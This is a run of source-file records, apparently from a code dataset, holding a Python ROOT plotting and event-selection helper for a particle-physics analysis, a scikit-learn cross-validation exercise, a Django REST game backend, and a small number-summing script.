    keyword name= sets the class name (default 'MyStruct').
    """
    def init(self, *pos, **named):
        # defaults first, then positional fields in declaration order,
        # then keyword overrides
        for key, val in kwargs.items():
            setattr(self, key, val)
        for idx, val in enumerate(pos):
            setattr(self, args[idx], val)
        for key, val in named.items():
            setattr(self, key, val)
    cls_name = kwargs.pop("name", "MyStruct")
    for field in args:
        kwargs[field] = None
    return type(cls_name, (object,), {'__init__': init, '__slots__': list(kwargs.keys())})
def mkHistoStruct(hname, binning):
    """Create a Struct holding the six standard histograms (Branch, Observed,
    GenSmeared, Gen, Rebalanced, RplusS) for observable hname, using either
    fixed binning [nbins, low, high] or a variable bin-edge list from binning."""
    # the observable key is everything after the first underscore, if present
    if '_' in hname: var = hname[hname.find('_')+1:]
    else: var = hname
    histoStruct = Struct('Branch','Observed','GenSmeared','Gen','Rebalanced','RplusS')
    if len(binning[var])==3:
        # fixed-width binning: [nbins, low, high]
        nbins = binning[var][0]
        low = binning[var][1]
        high = binning[var][2]
        histoStruct.Branch = TH1F('h'+hname+'Branch',hname+'Branch',nbins,low,high)
        histoStruct.Observed = TH1F('h'+hname+'Observed',hname+'Observed',nbins,low,high)
        histoStruct.GenSmeared = TH1F('h'+hname+'GenSmeared',hname+'GenSmeared',nbins,low,high)
        histoStruct.Gen = TH1F('h'+hname+'Gen',hname+'Gen',nbins,low,high)
        histoStruct.Rebalanced = TH1F('h'+hname+'Rebalanced',hname+'Rebalanced',nbins,low,high)
        histoStruct.RplusS = TH1F('h'+hname+'RplusS',hname+'RplusS',nbins,low,high)
    else:
        # variable binning: the list holds the bin edges
        nBin = len(binning[var])-1
        binArr = array('d',binning[var])
        histoStruct.Branch = TH1F('h'+hname+'Branch',hname+'Branch',nBin,binArr)
        histoStruct.Observed = TH1F('h'+hname+'Observed',hname+'Observed',nBin,binArr)
        histoStruct.GenSmeared = TH1F('h'+hname+'GenSmeared',hname+'GenSmeared',nBin,binArr)
        histoStruct.Gen = TH1F('h'+hname+'Gen',hname+'Gen',nBin,binArr)
        histoStruct.Rebalanced = TH1F('h'+hname+'Rebalanced',hname+'Rebalanced',nBin,binArr)
        histoStruct.RplusS = TH1F('h'+hname+'RplusS',hname+'RplusS',nBin,binArr)
    # fixed color scheme per histogram role
    histoStyler(histoStruct.Branch,kRed)
    histoStyler(histoStruct.Observed,kRed)
    histoStyler(histoStruct.GenSmeared,kBlack)
    histoStyler(histoStruct.Gen,kGreen)
    histoStyler(histoStruct.Rebalanced,kBlue)
    histoStyler(histoStruct.RplusS,kBlack)
    return histoStruct
def writeHistoStruct(hStructDict):
    """Write all six histograms of every struct in the dict to the currently
    open ROOT file (same order as the struct fields)."""
    for key in hStructDict:
        struct = hStructDict[key]
        for hist in (struct.Branch, struct.Observed, struct.GenSmeared,
                     struct.Gen, struct.Rebalanced, struct.RplusS):
            hist.Write()
def pause(str_='push enter key when ready'):
    """Print str_ and block until the user presses Enter (Python 2 syntax)."""
    import sys
    print str_
    sys.stdout.flush()
    raw_input('')
def mkmet(metPt, metPhi):
    """Build a transverse TLorentzVector for the missing energy (eta = 0,
    energy set equal to pt)."""
    vec = TLorentzVector()
    vec.SetPtEtaPhiE(metPt, 0, metPhi, metPt)
    return vec
datamc = 'Data'
def stamp(lumi='35.9', showlumi = False, WorkInProgress = True):
    """Draw the CMS label (plus optional lumi / sqrt(s) text) on the current
    pad using the module-level TLatex object tl and font constants."""
    tl.SetTextFont(cmsTextFont)
    tl.SetTextSize(0.98*tl.GetTextSize())
    tl.DrawLatex(0.135,0.915, 'CMS')
    tl.SetTextFont(extraTextFont)
    tl.SetTextSize(1.0/0.98*tl.GetTextSize())
    xlab = 0.213
    # ' simulation ' is drawn only when the module-level datamc contains 'MC'
    if WorkInProgress: tl.DrawLatex(xlab,0.915, ' Work in progress')
    else: tl.DrawLatex(xlab,0.915, ('MC' in datamc)*' simulation ')
    tl.SetTextFont(regularfont)
    tl.SetTextSize(0.81*tl.GetTextSize())
    thingy = ''
    if showlumi: thingy+='#sqrt{s}=13 TeV ('+str(lumi)+' fb^{-1})'
    xthing = 0.6202
    if not showlumi: xthing+=0.13
    tl.DrawLatex(xthing,0.915,thingy)
    # restore the text size so repeated calls don't shrink the label
    tl.SetTextSize(1.0/0.81*tl.GetTextSize())
def calcTrackIso(trk, tracks):
    """Relative track isolation: scalar pt sum of the other tracks within
    dR < 0.3 of trk, divided by the track pt.

    NOTE(review): the delta-phi here is a plain difference, not wrapped into
    [-pi, pi] -- confirm this is intended.
    """
    ptsum = -trk.pt()  # subtract the candidate itself up front
    for other in tracks:
        dR = TMath.Sqrt((trk.eta() - other.eta())**2 + (trk.phi() - other.phi())**2)
        if dR < 0.3:
            ptsum += other.pt()
    return ptsum / trk.pt()
def calcTrackJetIso(trk, jets):
    """Return False if any jet with pt > 30 lies within dR < 0.5 of the
    track, True otherwise (i.e. True means the track is jet-isolated)."""
    for jet in jets:
        if jet.pt() > 30:
            dR = TMath.Sqrt((trk.eta() - jet.eta())**2 + (trk.phi() - jet.phi())**2)
            if dR < 0.5:
                return False
    return True
'''
def calcMiniIso(trk, tracks):
pt = trk.pt()
ptsum = -pt
if pt<=50: R = 0.2
elif pt<=200: R = 10.0/pt
else: R = 0.05
for track in tracks:
dR = TMath.Sqrt( (trk.eta()-track.eta())**2 + (trk.phi()-track.phi())**2)
if dR<R: ptsum+=track.pt()
return ptsum/trk.pt()
def calcSumPt(jets, obj, conesize=0.6, thresh=10):
sumpt_ = 0
for jet in jets:
if not jet.Pt()>thresh:
continue
if not (obj.DeltaR(jet)<conesize):
continue
sumpt_+=jet.Pt()
return sumpt_
def getDPhis(metvec,jetvec):
dphilist = []
for j in range(4):
try:dphilist.append(abs(metvec.DeltaPhi(jetvec[j].tlv)))
except: dphilist.append(-5)
return dphilist
def isMatched(obj, col, dR=0.02, verbose = False):
matchedIdx = -1
bigDR = inf
for ic, thing in enumerate(col):
dr = thing.DeltaR(obj)
if verbose: print 'dr=',dr
if dr<dR:
ismatched = True
return thing
return False
def isMatched_(obj, col, dR=0.02, verbose = False):
matchedIdx = -1
bigDR = inf
for ic, thing in enumerate(col):
dr = thing[0].DeltaR(obj[0])
if verbose: print 'dr=',dr
if dr<dR:
ismatched = True
return thing
return False
def getLeadingGenBJet(GenJets, RecoJets, BTAG_CSV):
for gjet in GenJets:
for rjet in RecoJets:
dR_ = gjet.tlv.DeltaR(rjet.tlv)
if dR_<0.4 and rjet.csv>BTAG_CSV: return gjet
emptyvec = UsefulJet()
return emptyvec
def getLeadingBJet(RecoJets, CsvVec, BTAG_CSV):
for ireco in range(len(RecoJets)):
if not RecoJets[ireco].Pt()>30: continue
if CsvVec[ireco]>BTAG_CSV: return [ireco,RecoJets[ireco]]
emptyvec = TLorentzVector()
return [-1,emptyvec]
'''
def FabDraw(cGold,leg,hObserved,hComponents,datamc='mc',lumi='arbitrary', title = '', LinearScale=False, fractionthing='(bkg-obs)/obs'):
cGold.cd()
pad1 = TPad("pad1", "pad1", 0, 0.4, 1, 1.0)
pad1.SetBottomMargin(0.0)
pad1.SetLeftMargin(0.12)
if not LinearScale:
pad1.SetLogy()
pad1.SetGridx()
#pad1.SetGridy()
pad1.Draw()
pad1.cd()
for ih in range(1,len(hComponents[1:])+1):
hComponents[ih].Add(hComponents[ih-1])
hComponents.reverse()
if abs(hComponents[0].Integral(-1,999)-1)<0.001:
hComponents[0].GetYaxis().SetTitle('Normalized')
else: hComponents[0].GetYaxis().SetTitle('Events/GeV')
cGold.Update()
hObserved.GetYaxis().SetTitle('Normalized')
hObserved.GetYaxis().SetTitleOffset(1.15)
hObserved.SetMarkerStyle(20)
histheight = 1.5*max(hComponents[0].GetMaximum(),hObserved.GetMaximum())
if LinearScale: low, high = 0, histheight
else: low, high = max(0.001,max(hComponents[0].GetMinimum(),hObserved.GetMinimum())), 1000*histheight
title0 = hObserved.GetTitle()
if datamc=='MC':
for hcomp in hComponents: leg.AddEntry(hcomp,hcomp.GetTitle(),'lf')
leg.AddEntry(hObserved,hObserved.GetTitle(),'lpf')
else:
for ihComp, hComp in enumerate(hComponents):
leg.AddEntry(hComp, hComp.GetTitle(),'lpf')
leg.AddEntry(hObserved,title0,'lp')
hObserved.SetTitle('')
hComponents[0].SetTitle('')
hComponents[0].Draw('hist')
for h in hComponents[1:]:
h.Draw('hist same')
cGold.Update()
print 'updating stack', h
hComponents[0].Draw('same')
hObserved.Draw('p same')
hObserved.Draw('e same')
cGold.Update()
hComponents[0].Draw('axis same')
leg.Draw()
cGold.Update()
stampFab(lumi,datamc)
cGold.Update()
cGold.cd()
pad2 = TPad("pad2", "pad2", 0, 0.05, 1, 0.4)
pad2.SetTopMargin(0.0)
pad2.SetBottomMargin(0.3)
pad2.SetLeftMargin(0.12)
pad2.SetGridx()
pad2.SetGridy()
pad2.Draw()
pad2.cd()
hObservedCopy = hObserved.Clone('hObservedClone'+hComponents[0].GetName())
hRatio = hObservedCopy.Clone('hRatioClone')#hComponents[0].Clone('hRatioClone')#+hComponents[0].GetName()+'testing
hRatio.SetMarkerStyle(20)
#hFracDiff = hComponents[0].Clone('hFracDiff')
#hFracDiff.SetMarkerStyle(20)
hObservedCopy.SetMarkerStyle(20)
hObservedCopy.SetMarkerColor(1)
#histoStyler(hFracDiff, 1)
histoStyler(hObservedCopy, 1)
#hFracDiff.Add(hObservedCopy,-1)
#hFracDiff.Divide(hObservedCopy)
#hRatio.Divide(hObservedCopy)
hRatio.Divide(hComponents[0])
hRatio.GetYaxis().SetRangeUser(0.0,.1)###
hRatio.SetTitle('')
if 'prediction' in title0: hFracDiff.GetYaxis().SetTitle('(RS-#Delta#phi)/#Delta#phi')
else: hRatio.GetYaxis().SetTitle(fractionthing)
hRatio.GetXaxis().SetTitleSize(0.12)
hRatio.GetXaxis().SetLabelSize(0.11)
hRatio.GetYaxis().SetTitleSize(0.12)
hRatio.GetYaxis().SetLabelSize(0.12)
hRatio.GetYaxis().SetNdivisions(5)
hRatio.GetXaxis().SetNdivisions(10)
hRatio.GetYaxis().SetTitleOffset(0.5)
hRatio.GetXaxis().SetTitleOffset(1.0)
hRatio.GetXaxis().SetTitle(hObserved.GetXaxis().GetTitle())
hRatio.Draw()
hRatio.Draw('e0')
pad1.cd()
hComponents.reverse()
hObserved.SetTitle(title0)
return hRatio
def FabDrawSystyRatio(cGold,leg,hObserved,hComponents,datamc='mc',lumi=35.9, title = '', LinearScale=False, fractionthing='(bkg-obs)/obs'):
cGold.cd()
pad1 = TPad("pad1", "pad1", 0, 0.4, 1, 1.0)
pad1.SetBottomMargin(0.0)
pad1.SetLeftMargin(0.12)
if not LinearScale:
pad1.SetLogy()
#pad1.SetGridx()
#pad1.SetGridy()
pad1.Draw()
pad1.cd()
for ih in range(1,len(hComponents[1:])+1):
hComponents[ih].Add(hComponents[ih-1])
hComponents.reverse()
if abs(hComponents[0].Integral(-1,999)-1)<0.001:
hComponents[0].GetYaxis().SetTitle('Normalized')
else: hComponents[0].GetYaxis().SetTitle('Events/GeV')
cGold.Update()
hObserved.GetYaxis().SetTitle('Normalized')
hObserved.GetYaxis().SetTitleOffset(1.15)
hObserved.SetMarkerStyle(20)
histheight = 1.5*max(hComponents[0].GetMaximum(),hObserved.GetMaximum())
if LinearScale: low, high = 0, histheight
else: low, high = max(0.001,max(hComponents[0].GetMinimum(),hObserved.GetMinimum())), 1000*histheight
title0 = hObserved.GetTitle()
if datamc=='MC':
for hcomp in hComponents: leg.AddEntry(hcomp,hcomp.GetTitle(),'lf')
leg.AddEntry(hObserved,hObserved.GetTitle(),'lpf')
else:
for ihComp, hComp in enumerate(hComponents):
leg.AddEntry(hComp, hComp.GetTitle(),'lpf')
leg.AddEntry(hObserved,title0,'lp')
hObserved.SetTitle('')
hComponents[0].SetTitle('')
xax = hComponents[0].GetXaxis()
hComponentsUp = hComponents[0].Clone(hComponents[0].GetName()+'UpVariation')
hComponentsUp.SetLineColor(kWhite)
hComponentsDown = hComponents[0].Clone(hComponents[0].GetName()+'DownVariation')
hComponentsDown.SetFillColor(10)
hComponentsDown.SetFillStyle(1001)
hComponentsDown.SetLineColor(kWhite)
for ibin in range(1, xax.GetNbins()+1):
hComponentsUp.SetBinContent(ibin, hComponents[0].GetBinContent(ibin)+hComponents[0].GetBinError(ibin))
hComponentsDown.SetBinContent(ibin, hComponents[0].GetBinContent(ibin)-hComponents[0].GetBinError(ibin))
hComponents[0].Draw('hist')
#hComponentsUp.Draw('hist')
#hComponentsDown.Draw('hist same')
for h in hComponents[1:]:
print 'there are actually components here!'
h.Draw('hist same')
cGold.Update()
print 'updating stack', h
#hComponents[0].Draw('same')
hObserved.Draw('p same')
hObserved.Draw('e same')
cGold.Update()
hComponents[0].Draw('axis same')
leg.Draw()
cGold.Update()
stampFab(lumi,datamc)
cGold.Update()
cGold.cd()
pad2 = TPad("pad2", "pad2", 0, 0.05, 1, 0.4)
pad2.SetTopMargin(0.0)
pad2.SetBottomMargin(0.3)
pad2.SetLeftMargin(0.12)
#pad2.SetGridx()
pad2.SetGridy()
pad2.Draw()
pad2.cd()
hObservedCopy = hObserved.Clone('hObservedClone'+hComponents[0].GetName())
hRatio = hObservedCopy.Clone('hRatioClone')#hComponents[0].Clone('hRatioClone')#+hComponents[0].GetName()+'testing
hRatio.SetMarkerStyle(20)
#hFracDiff = hComponents[0].Clone('hFracDiff')
#hFracDiff.SetMarkerStyle(20)
hObservedCopy.SetMarkerStyle(20)
hObservedCopy.SetMarkerColor(1)
#histoStyler(hFracDiff, 1)
histoStyler(hObservedCopy, 1)
#hFracDiff.Add(hObservedCopy,-1)
#hFracDiff.Divide(hObservedCopy)
#hRatio.Divide(hObservedCopy)
histoByWhichToDivide = hComponents[0].Clone()
for ibin in range(1, xax.GetNbins()+1): histoByWhichToDivide.SetBinError(ibin, 0)
hRatio.Divide(histoByWhichToDivide)
hRatio.GetYaxis().SetRangeUser(0.0,.1)###
hRatio.SetTitle('')
if 'prediction' in title0: hFracDiff.GetYaxis().SetTitle('(RS-#Delta#phi)/#Delta#phi')
else: hRatio.GetYaxis().SetTitle(fractionthing)
hRatio.GetXaxis().SetTitleSize(0.12)
hRatio.GetXaxis().SetLabelSize(0.11)
hRatio.GetYaxis().SetTitleSize(0.12)
hRatio.GetYaxis().SetLabelSize(0.12)
hRatio.GetYaxis().SetNdivisions(5)
hRatio.GetXaxis().SetNdivisions(10)
hRatio.GetYaxis().SetTitleOffset(0.5)
hRatio.GetXaxis().SetTitleOffset(1.0)
hRatio.GetXaxis().SetTitle(hObserved.GetXaxis().GetTitle())
hRatio.Draw()
histoMethodFracErrorNom = hComponents[0].Clone(hComponents[0].GetName()+'hMethodSystNom')
histoMethodFracErrorNom.SetLineColor(kBlack)
histoMethodFracErrorNom.SetFillStyle(1)
histoMethodFracErrorUp = hComponents[0].Clone(hComponents[0].GetName()+'hMethodSystUp')
histoMethodFracErrorUp.SetFillStyle(3001)
histoMethodFracErrorUp.SetLineColor(kWhite)
histoMethodFracErrorUp.SetFillColor(hComponents[0].GetFillColor())
histoMethodFracErrorDown = hComponents[0].Clone(hComponents[0].GetName()+'hMethodSystDown')
histoMethodFracErrorDown.SetLineColor(kWhite)
#histoMethodFracErrorDown.SetFillStyle(1001)
histoMethodFracErrorDown.SetFillColor(10)
for ibin in range(1, xax.GetNbins()+1):
content = histoMethodFracErrorUp.GetBinContent(ibin)
if content>0: err = histoMethodFracErrorUp.GetBinError(ibin)/content
else: err = 0
histoMethodFracErrorUp.SetBinContent(ibin, 1+err)
histoMethodFracErrorUp.SetBinError(ibin, 0)
histoMethodFracErrorDown.SetBinContent(ibin, 1-err)
histoMethodFracErrorDown.SetBinError(ibin, 0)
histoMethodFracErrorNom.SetBinContent(ibin, 1)
histoMethodFracErrorNom.SetBinError(ibin, 0)
hRatio.GetYaxis().SetRangeUser(-0.2,3.2)
hRatio.Draw('e0')
histoMethodFracErrorUp.Draw('same hist')
histoMethodFracErrorNom.Draw('same')
histoMethodFracErrorDown.Draw('same hist')
hRatio.Draw('e0 same')
hRatio.Draw('axis same')
pad1.cd()
hComponents.reverse()
hObserved.SetTitle(title0)
pad1.Update()
return hRatio, [histoMethodFracErrorNom, histoMethodFracErrorUp, histoMethodFracErrorDown, hComponentsUp, hComponentsDown]
def stampFab(lumi = 'n/a',datamc='MC'):
    """Stamp the CMS label, the simulation tag and the lumi text on the
    current pad via the module-level TLatex object `tl`."""
    base_size = tl.GetTextSize()
    tl.SetTextFont(cmsTextFont)
    tl.SetTextSize(1.6 * base_size)
    tl.DrawLatex(0.152, 0.82, 'CMS')
    tl.SetTextFont(extraTextFont)
    simulation_tag = ' simulation internal' if 'MC' in datamc else ''
    tl.DrawLatex(0.14, 0.74, simulation_tag)
    tl.SetTextFont(regularfont)
    if lumi == '':
        tl.DrawLatex(0.62, 0.82, '#sqrt{s} = 13 TeV')
    else:
        tl.DrawLatex(0.48, 0.82, '#sqrt{s} = 13 TeV (' + str(lumi) + ' fb^{-1})')
    # Restore the original text size for subsequent stamps.
    tl.SetTextSize(tl.GetTextSize() / 1.6)
# Axis unit for each kinematic variable (used when labeling plots).
units = {
    'HardMet': 'GeV',
    'Met': 'GeV',  # same unit as HardMet
    'Ht': 'GeV',
    'St': 'GeV',
    'NJets': 'bin',
    'BTags': 'bin',
    'Jet1Pt': 'GeV',
    'Jet1Eta': 'bin',
    'Jet2Pt': 'GeV',
    'Jet2Eta': 'bin',
    'Jet3Pt': 'GeV',
    'Jet3Eta': 'bin',
    'Jet4Pt': 'GeV',
    'Jet4Eta': 'bin',
    'HardMetPhi': 'rad',
    'DPhi1': 'rad',
    'DPhi2': 'rad',
    'DPhi3': 'rad',
    'DPhi4': 'rad',
    'SearchBins': 'bin',
    'MvaLowHardMet': 'bin',
    'MvaLowHt': 'bin',
    'Odd': 'modulo false',
    'csvAve': '',
    'BestDijetMass': 'GeV',
    'MinDeltaM': 'GeV',
    'MaxDPhi': 'rad',
    'MaxForwardPt': 'GeV',
    'MaxHemJetPt': 'GeV',
    'HtRatio': 'bin',
    'MinDeltaPhi': 'bin',
    'NPhotons': 'bin',
    'DPhiPhoPho': 'bin',
}

# Baseline selection thresholds.
baseline = {
    'HardMet': 300,
    'Ht': 300,
    'NJets': 2,
    'BTags': 0,
    'DPhi1': 0.5,
    'DPhi2': 0.5,
    'DPhi3': 0.3,
    'DPhi4': 0.3,
}

# Human-readable (LaTeX-ish) labels for the baseline cuts.
baselineStr = {
    'HardMet': 'E_{T}^{miss} > ' + str(baseline['HardMet']) + ' GeV',
    'Ht': 'H_{T} > ' + str(baseline['Ht']) + ' GeV',
    'NJets': 'N_{jets} #geq ' + str(baseline['NJets']),
    'BTags': '',
    'DPhi1': '#Delta#phi_{1}',
    'DPhi2': '#Delta#phi_{2}',
    'DPhi3': '#Delta#phi_{3}',
    'DPhi4': '#Delta#phi_{4}',
}
def mkCutsLabel(kinvar,regionselect='', baselineStr_ = baselineStr):
    """Build a comma-separated label of the baseline cuts, omitting the cut
    on the plotted variable `kinvar` and region-dependent cuts.

    BUG FIX: the loop previously iterated the module-level `baselineStr`
    while indexing `baselineStr_`, so a custom dict passed by the caller was
    partly ignored (and could KeyError); it now uses the parameter throughout.
    """
    str_ = ''
    for key in baselineStr_:
        if kinvar in key: continue
        if baselineStr_[key]=='': continue
        if kinvar=='Met' and 'miss' in baselineStr_[key]: continue
        if 'Phi' in key and 'LowDeltaPhi' in regionselect: continue
        if 'Jet' in kinvar and 'Jets' not in kinvar and 'HardMet' in key: continue
        str_+= baselineStr_[key]+', '
    # Trim the trailing ', ' separator.
    if len(str_)>1 and str_[-2:]==', ':
        str_=str_[:-2]
    if 'LowDeltaPhi' in regionselect: str_+= ', #Delta#phi(inv.)'
    return str_
def mkLabel(str_,kinvar,selection=''):
    """Strip histogram-name decorations down to a readable legend label."""
    # Drop the conventional leading 'h' of histogram names.
    label = str_[1:] if str_[0] == 'h' else str_
    # Apply the renames in the same fixed order as always.
    for old, new in (('GenSmeared', ' gen-smeared '),
                     ('Rebalanced', ' rebalanced '),
                     ('RplusS', 'QCD R&S'),
                     ('Observed', 'QCD Observed'),
                     (kinvar, ''),
                     ('_b', ''),
                     ('_', ''),
                     (selection + ' ', '')):
        label = label.replace(old, new)
    return label
def nicelabel(label):
    """Translate an internal variable name into a LaTeX-ish axis label."""
    pretty = label
    # Order matters: e.g. 'HardMet' must be handled before 'Met'.
    for old, new in (('Vs', ' vs '),
                     ('HardMet', 'E_{T}^{miss}'),
                     ('St', 'H_{T}'),
                     ('Met', 'E_{T}^{miss}'),
                     ('Ht', 'H_{T}'),
                     ('NJets', 'N_{jets}'),
                     ('BTags', 'N_{b-jets}'),
                     ('Pt', ' p_{T}'),
                     ('Eta', ' #eta')):
        pretty = pretty.replace(old, new)
    if 'DPhi' in pretty:
        # Expand DPhi<i> into a full Delta-phi(HT-miss, jet i) label.
        pretty = pretty.replace('DPhi', '#Delta#phi(H^{miss}_{T}, jet') + ')'
        numberloc = max(pretty.find(digit) for digit in '1234') + 1
        pretty = pretty[:numberloc] + ', ' + pretty[numberloc:]
        pretty = pretty.replace(', )', ')')
    return pretty
def passQCDHighMETFilter(t):
    """Return False when a hard, muon-energy-dominated jet is back-to-back
    with MET (a fake-MET topology); True otherwise."""
    met4vec = mkmet(t.MET, t.METPhi)
    for jet_index, jet in enumerate(t.Jets):
        hard_enough = jet.Pt() > 200
        muon_dominated = t.Jets_muonEnergyFraction[jet_index] > 0.5
        if hard_enough and muon_dominated and abs(jet.DeltaPhi(met4vec)) > (3.14159 - 0.4):
            return False
    return True
def passQCDHighMETFilter2(t):
    """Return False when the leading jet is back-to-back with MET and has a
    very small neutral-EM energy fraction; True otherwise."""
    if not len(t.Jets) > 0:
        return True
    metvec = TLorentzVector()
    metvec.SetPtEtaPhiE(t.MET, 0, t.METPhi, 0)
    back_to_back = abs(t.Jets[0].DeltaPhi(metvec)) > (3.14159 - 0.4)
    low_neutral_em = t.Jets_neutralEmEnergyFraction[0] < 0.03
    return not (back_to_back and low_neutral_em)
def passesUniversalSelection(t):
	"""Apply the common event-cleaning selection to event t.

	Returns True only if the vertex requirement, the two QCD fake-MET
	filters above, the PF/Calo MET consistency check and every MET-cleaning
	flag all pass.  The triple-quoted strings near the end are no-op markers
	the author toggles by hand to split the filter list; kept verbatim.
	"""
	if not ( t.NVtx>0): return False #bool(t.JetID) and
	if not passQCDHighMETFilter(t): return False
	if not passQCDHighMETFilter2(t): return False
	if not t.PFCaloMETRatio<5: return False
	#featuring:
	#if not t.globalTightHalo2016Filter: return False ##this alone was good # only these comments weren't saved on last submission
	if not bool(t.globalSuperTightHalo2016Filter): return False
	if not bool(t.HBHENoiseFilter): return False
	if not bool(t.HBHEIsoNoiseFilter): return False
	if not bool(t.eeBadScFilter): return False
	if not bool(t.BadChargedCandidateFilter): return False
	if not bool(t.BadPFMuonFilter): return False
	if not bool(t.CSCTightHaloFilter): return False
	if not bool(t.EcalDeadCellTriggerPrimitiveFilter): return False ##I think this one makes a sizeable difference
	if not bool(t.ecalBadCalibReducedExtraFilter): return False
	if not bool(t.ecalBadCalibReducedFilter): return False
	'''#first half filters up edge
	#first half filters low edge
	####if not t.ecalBadCalibFilter: return False #this says it's deprecated
	'''#second half filters low edge
	return True
def passesHadronicSusySelection(t):
    """Require a fully hadronic event: no reconstructed leptons and no
    isolated electron/muon/pion tracks."""
    vetoed_counts = (t.NElectrons, t.NMuons,
                     t.isoElectronTracks, t.isoMuonTracks, t.isoPionTracks)
    return all(count == 0 for count in vetoed_counts)
| [
"[email protected]"
] | |
71e678a0332eb9b0dddc74e7ee7677d3d3e5f0be | d10c5d3603e027a8fd37115be05e62634ec0f0a5 | /10_Supervised-Learning-with-scikit-learn/10_ex_2-10.py | 684d17126431f630f2a9e550a279918f00947165 | [] | no_license | stacygo/2021-01_UCD-SCinDAE-EXS | 820049125b18b38ada49ffc2036eab33431d5740 | 027dc2d2878314fc8c9b2796f0c2e4c781c6668d | refs/heads/master | 2023-04-29T01:44:36.942448 | 2021-05-23T15:29:28 | 2021-05-23T15:29:28 | 335,356,448 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | # Exercise 2-10: K-Fold CV comparison
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
# Load the Gapminder data; target is life expectancy, features are everything
# except the target and the non-numeric Region column.
df = pd.read_csv('input/gm_2008_region.csv')
y = df['life'].values
X = df.drop(['life', 'Region'], axis=1).values

# Compare mean cross-validated scores of a linear regression for 3 and 10 folds.
reg = LinearRegression()
for n_folds in (3, 10):
    fold_scores = cross_val_score(reg, X, y, cv=n_folds)
    print(np.mean(fold_scores))
| [
"[email protected]"
] | |
a357f99eeb2586079e4f9f2f7d69c6f57ffcb713 | 8522034ed44d22a50b45f36e7dea057b1ca9c9bd | /core/views.py | 49d2d84d2b27fb7ee828f7685fc2c656a7e45160 | [] | no_license | JayjeetAtGithub/oth2 | 71c769150d132a253ce9a64da83442ed3409a592 | d8be9b8e69d23c137045ce8485b27e08300db809 | refs/heads/master | 2020-03-22T14:04:51.838326 | 2018-07-16T18:11:18 | 2018-07-16T18:11:18 | 140,152,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,524 | py | from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from .models import Player , Level , TotalLevel
from .serializers import PlayerSerializer , LevelSerializer , TotalLevelSerializer , LeaderboardSerializer , UserSerializer
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from datetime import datetime
class Leaderboard(APIView):
    """Return every player, recomputing ranks first (highest score wins,
    earliest timestamp breaks ties)."""

    def get(self, request, format=None):
        if not request.user.is_authenticated:
            return Response("Unauthenticated")
        ordered_players = Player.objects.order_by('-score', 'timestamp')
        # Persist 1-based ranks in score order.
        for position, player in enumerate(ordered_players, start=1):
            player.rank = position
            player.save()
        serializer = LeaderboardSerializer(Player.objects.all(), many=True)
        return Response(serializer.data)
class Rules(APIView):
    """Serve the rules text to authenticated users."""

    def get(self, request, format=None):
        if request.user.is_authenticated:
            return Response('Rules')
        return Response("Unauthenticated")
class RegisterUser(APIView):
    """Create a user plus its Player profile, or echo an existing user back."""

    def post(self, request, format=None):
        existing = User.objects.filter(username=request.data['username']).first()
        if existing is not None:
            # Already registered: return the stored record as-is.
            return Response(UserSerializer(existing).data)
        new_user = User.objects.create_user(request.data['username'])
        new_user.email = request.data['email']
        new_user.first_name = request.data['first_name']
        new_user.last_name = request.data['last_name']
        new_user.save()
        profile = Player(user=new_user,
                         player_name=new_user.first_name + " " + new_user.last_name)
        profile.save()
        return Response(UserSerializer(new_user).data, status=status.HTTP_201_CREATED)
class Index(APIView):
    """Report the player's current state: next level, win, or finish screen."""

    def get(self, request, format=None):
        # Highest playable level number, stored in the singleton TotalLevel row.
        last_level = TotalLevel.objects.filter(id=1).first().total_level
        user = request.user
        if user.is_authenticated:
            player = Player.objects.filter(user=user).first()
            try:
                # BUG FIX: filter() never raises DoesNotExist, so the except
                # branch was unreachable; get() raises when the level is missing.
                Level.objects.get(level_number=player.current_level)
                return Response("level")
            except Level.DoesNotExist:
                if player.current_level > last_level:
                    return Response("win")
                return Response("finish")
        return Response("index")
class Answer(APIView):
    """Check a submitted answer; on success advance the player and report
    the next screen (level transition, win, or finish)."""

    def post(self, request, format=None):
        # BUG FIX: previously the model instance itself was compared against
        # player.current_level; we need the stored integer.
        last_level = TotalLevel.objects.filter(id=1).first().total_level
        ans = request.data['ans']
        user = request.user
        if not user.is_authenticated:
            return Response("Unauthorized")
        player = Player.objects.filter(user=user).first()
        try:
            # BUG FIX: filter() returns a queryset (no .answer attribute) and
            # never raises DoesNotExist; get() does both correctly.
            level = Level.objects.get(level_number=player.current_level)
        except Level.DoesNotExist:
            if player.current_level > last_level:
                return Response("win")
            return Response("finish")
        if ans == level.answer:
            player.current_level = player.current_level + 1
            player.score = player.score + 10
            # BUG FIX: datetime.now was assigned without being called.
            player.timestamp = datetime.now()
            level.number_of_user = level.number_of_user + 1
            level.accuracy = round(level.number_of_user / float(level.number_of_user + level.wrong), 2)
            level.save()
            player.save()
            try:
                Level.objects.get(level_number=player.current_level)
                return render(request, 'level_transition.html')
            except Level.DoesNotExist:
                if player.current_level > last_level:
                    return Response("win")
                return Response("finish")
        elif ans == "":
            pass
        else:
            level.wrong = level.wrong + 1
            level.save()
        # Wrong or empty answers fall through here, as before.
        return Response("Unauthorized")
| [
"[email protected]"
] | |
b99feeb950808a1214d6463cae0a95bd16ba39f0 | ffe4c155e228f1d3bcb3ff35265bb727c684ec1a | /Codes/file写入/compute_sum.py | 64fade6866b28dd98f940d12e8ea81c8fefedaa8 | [] | no_license | yuuee-www/Python-Learning | 848407aba39970e7e0058a4adb09dd35818c1d54 | 2964c9144844aed576ea527acedf1a465e9a8664 | refs/heads/master | 2023-03-12T00:55:06.034328 | 2021-02-28T13:43:14 | 2021-02-28T13:43:14 | 339,406,816 | 0 | 0 | null | 2021-02-28T11:27:40 | 2021-02-16T13:26:46 | Jupyter Notebook | UTF-8 | Python | false | false | 414 | py | def main():
sum = 0.0
with open("bad_numbers.txt") as file:
for n in file.read().split():
# try to convert n to a float, but if it
# is not a valid float, print error message
try:
print(float(n))
sum += float(n)
except ValueError:
print("Invalid number:", n)
print("Sum is:", round(sum, 1))
main() | [
"[email protected]"
] | |
4f836b2023d170e009b30b7f259ccce89b59b81b | a71582e89e84a4fae2595f034d06af6d8ad2d43a | /tensorflow/python/ops/ragged/ragged_dispatch.py | 1115eee4129f202ecda914d185a6dc76e3187919 | [
"Apache-2.0"
